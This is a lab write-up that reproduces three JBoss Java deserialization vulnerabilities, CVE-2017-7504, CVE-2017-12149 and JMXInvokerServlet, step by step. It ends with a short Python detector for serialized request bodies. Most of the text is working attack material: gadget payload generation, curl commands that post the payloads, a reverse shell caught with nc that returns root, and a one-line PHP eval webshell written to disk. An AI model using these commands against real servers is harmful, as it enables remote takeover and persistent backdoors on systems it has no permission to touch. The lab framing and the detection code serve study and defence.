JBoss Vulnerability Reproduction

0x00 Preface

0x01 JBossMQ JMS Deserialization Vulnerability (CVE-2017-7504)

Vulnerability description

Red Hat JBoss Application Server is an open-source application server based on Java EE. In JBoss AS 4.x and earlier, the HTTPServerILServlet.java file of the JMS over HTTP Invocation Layer in the JBossMQ implementation contains a deserialization vulnerability; a remote attacker can exploit it with crafted serialized data to execute arbitrary code.

Reproduction

docker-compose up -d

Target: http://192.168.220.151:8080

Tool used: JavaDeserH2HC

PoC usage:

On the attacker machine, download and run the following to generate the binary payload file:

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

# change the host IP and port that receive the shell

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.133:8080 (IP:port)

Send the attack payload to the target server with curl:
curl http://192.168.220.151:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

We choose a gadget: ExampleCommonsCollections1WithHashMap

Compile it and generate the serialized data:

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"

Execution result:

root@kali:~/桌面/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java
root@kali:~/桌面/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
Saving serialized object in ExampleCommonsCollections1WithHashMap.ser

The command we execute is touch /tmp/success. Once the tool finishes, a file ExampleCommonsCollections1WithHashMap.ser is generated; send it as the body of the following request:

curl http://192.168.220.151:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

This step prints a few warnings, but they do not seem to affect the result.

Run docker exec -ti <container ID> /bin/bash to enter the container:

root@0ec136da132e:/opt/jdk# cd /tmp
root@0ec136da132e:/tmp# ls
hsperfdata_root success

A one-line webshell can be written to disk with output redirection:

echo '<?php @eval(_POST['test']); ?>' > /tmp/test.php

Execution result:

root@0ec136da132e:/tmp# ls
aa.php hsperfdata_root success
root@0ec136da132e:/tmp# cat aa.php
<?php @eval(_POST[test]); ?>
root@0ec136da132e:/tmp#

References

  1. https://github.com/joaomatosf/JavaDeserH2HC

0x02 JBoss 5.x/6.x Deserialization Vulnerability (CVE-2017-12149)

Vulnerability description

This is a Java deserialization flaw located in the ReadOnlyAccessFilter of JBoss's HttpInvoker component. The filter attempts to deserialize the data stream received from the client without performing any security check, which is what makes the vulnerability possible.

Reproduction

docker-compose up -d

Once initialization completes, visiting http://192.168.220.151:8080/ shows the JBoss default page.
The vulnerability lies in the /invoker/readonly request: the server Java-deserializes the POST body submitted by the user.

Download the PoC: https://github.com/joaomatosf/JavaDeserH2HC

Use the PoC:

root@kali:~/桌面/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

root@kali:~/桌面/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.133:8888
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

Start a listener on the attacker machine:

nc -lvvp 8888
listening on [any] 8888 ...

Send the payload to the target:

root@kali:~/桌面/JavaDeserH2HC# curl http://192.168.220.151:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
<html><head><title>JBoss Web/3.0.0-CR2 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 500 - </h1><HR size="1" noshade="noshade"><p><b>type</b> Exception report</p><p><b>message</b> <u></u></p><p><b>description</b> <u>The server encountered an internal error () that prevented it from fulfilling this request.</u></p><p><b>exception</b> <pre>java.lang.ClassCastException: java.util.HashSet cannot be cast to org.jboss.invocation.MarshalledInvocation
org.jboss.invocation.http.servlet.ReadOnlyAccessFilter.doFilter(ReadOnlyAccessFilter.java:106)
</pre></p><p><b>note</b> <u>The full stack trace of the root cause is available in the JBoss Web/3.0.0-CR2 logs.</u></p><HR size="1" noshade="noshade"><h3>JBoss Web/3.0.0-CR2</h3></body></html>root@kali:~/桌面/JavaDeserH2HC#

The reverse shell connects back successfully!!!

root@kali:~# nc -lvvp 8888
listening on [any] 8888 ...
192.168.220.151: inverse host lookup failed: Unknown host
connect to [192.168.220.133] from (UNKNOWN) [192.168.220.151] 53530
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

References

0x03 JMXInvokerServlet Deserialization Vulnerability

Vulnerability description

This vulnerability differs little from the previous two: JBoss reads a serialized object when handling requests to /invoker/JMXInvokerServlet.

So it is enough to change the URL to the following:

http://192.168.220.151:8080/invoker/JMXInvokerServlet

root@kali:~/桌面/JavaDeserH2HC# javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
root@kali:~/桌面/JavaDeserH2HC# java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 192.168.220.133:8888
Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser

Start a listener on the attacker machine:

nc -lvvp 8888
listening on [any] 8888 ...

Send the payload to the target:

root@kali:~/桌面/JavaDeserH2HC# curl http://192.168.220.151:8080/invoker/JMXInvokerServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
Warning: Binary output can mess up your terminal. Use "--output -" to tell
Warning: curl to output it to your terminal anyway, or consider "--output
Warning: <FILE>" to save to a file.

There are a few warnings, but they do not affect the operation.

The reverse shell connects back successfully.

root@kali:~# nc -lvvp 8888
listening on [any] 8888 ...
192.168.220.151: inverse host lookup failed: Unknown host
connect to [192.168.220.133] from (UNKNOWN) [192.168.220.151] 41174
whoami
root
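As a defender-side counterpart to the three endpoints exercised in sections 0x01 to 0x03, here is an added example that is not part of the original post: it parses raw HTTP requests and flags bodies that carry the Java serialization stream header when they are sent to those JBoss invoker paths. The endpoint table, the severity labels and the sample requests are this example's own assumptions.

```python
# Endpoints exercised in sections 0x01 to 0x03 of this write-up. The servlet paths are
# JBoss's own; grouping them into this table is an assumption made for this example.
JBOSS_DESER_ENDPOINTS = {
    "/jbossmq-httpil/HTTPServerILServlet": "JBossMQ JMS over HTTP (CVE-2017-7504)",
    "/invoker/readonly": "HttpInvoker ReadOnlyAccessFilter (CVE-2017-12149)",
    "/invoker/JMXInvokerServlet": "JMXInvokerServlet",
}
# Stream header written by java.io.ObjectOutputStream: STREAM_MAGIC 0xACED, STREAM_VERSION 5.
JAVA_SERIAL_MAGIC = b"\xac\xed\x00\x05"


def parse_raw_http(raw: bytes):
    """Split a raw HTTP/1.x request into (method, path, body); the query string is dropped."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line = head.split(b"\r\n", 1)[0].decode("latin-1")
    method, target, _version = request_line.split(" ", 2)
    return method, target.split("?", 1)[0], body


def classify(method: str, path: str, body: bytes):
    """Return a finding dict for a suspicious request, or None for benign traffic."""
    endpoint = JBOSS_DESER_ENDPOINTS.get(path)
    serialized = body.startswith(JAVA_SERIAL_MAGIC)
    if endpoint and serialized:
        # The 500/ClassCastException shown in the write-up is raised only after
        # readObject() has already run, so a server error is not evidence of a block.
        return {"severity": "high", "path": path, "reason": "Java serialized body to " + endpoint}
    if endpoint:
        return {"severity": "medium", "path": path, "reason": method + " to " + endpoint + ", no stream header"}
    if serialized:
        return {"severity": "low", "path": path, "reason": "Java serialized body to unlisted path"}
    return None


def scan_requests(raws):
    """Parse and classify each raw request, returning only the findings."""
    return [f for f in (classify(*parse_raw_http(r)) for r in raws) if f]


# Constructed sample requests, not captured traffic; bodies are short stand-ins.
SAMPLES = [
    b"POST /invoker/readonly HTTP/1.1\r\nHost: jboss\r\nContent-Length: 8\r\n\r\n\xac\xed\x00\x05sr\x00\x11",
    b"POST /invoker/JMXInvokerServlet HTTP/1.1\r\nHost: jboss\r\n\r\nhello",
    b"GET /jbossmq-httpil/HTTPServerILServlet?x=1 HTTP/1.1\r\nHost: jboss\r\n\r\n",
    b"POST /app/upload HTTP/1.1\r\nHost: jboss\r\n\r\n\xac\xed\x00\x05w\x02",
    b"GET /index.html HTTP/1.1\r\nHost: jboss\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLES):
        print(finding)
```

Any request that reaches these paths is worth a medium alert on its own, since the servlets have no legitimate use from untrusted networks; the stream header check raises it to high.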